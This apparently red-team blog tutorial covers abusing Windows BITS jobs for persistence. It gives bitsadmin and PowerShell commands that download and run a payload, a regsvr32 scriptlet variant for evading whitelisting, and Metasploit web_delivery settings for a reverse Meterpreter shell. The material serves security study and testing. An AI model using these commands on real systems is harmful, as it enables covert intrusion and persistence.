Windows operating systems contain various utilities which can be used by system administrators to perform various tasks. One of these utilities is the Background Intelligent Transfer Service (BITS) which can facilitate file transfer capability to web servers (HTTP ) and share folders (SMB). Microsoft provides a binary called “bitsadmin” and PowerShell cmdlets for creating and managing transfer of files.

From an offensive point of view this functionality can be abused in order to download payloads (executable files, PowerShell scripts, scriptlets etc.) on the compromised host and execute these files at a given time in order to create persistence in a red team operation. However, interacting with the “bitsadmin” requires Administrator level privileges. Executing the following command will download a malicious payload from a remote location to a local directory.

bitsadmin /transfer backdoor /download /priority high C:\tmp\pentestlab.exe
Bitsadmin – File Transfer

There is also a PowerShell cmdlet which can perform the same task.

Start-BitsTransfer -Source "" -Destination "C:\tmp\pentestlab.exe"
BitsTrasfer – Transfer Files PowerShell

Once the file has been dropped into disk the persistence can be achieved by executing the following commands from the “bitsadmin” utility. Usage is pretty straightforward:

  1. the create parameter requires a name for the job
  2. the addfile requires the remote location of the file and the local path
  3. the SetNotifyCmdLine the command that will executed
  4. the SetMinRetryDelay defines the time for the callback (in seconds)
  5. The resume parameter will run the bits job.
bitsadmin /create backdoor
bitsadmin /addfile backdoor ""  "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor
Persistence – BITS Jobs

When the job run on the system the payload will executed and a Meterpreter session will open or the communication will received back to the Command and Control (depending on which C2 is used in the occasion).

Persistence – BITS Jobs Meterpreter

The parameter SetNotifyCmdLine can also be used to execute a scriptlet from a remote location via the regsvr32 utility. The benefit of this method is that it doesn’t touches the disk and can evade application whitelisting products.

bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i: scrobj.dll"
bitsadmin /resume backdoor
BITS Jobs – Regsvr32

Metasploit framework can be used to capture the payload through the web delivery module.

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
BITS Job – Regsvr32


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s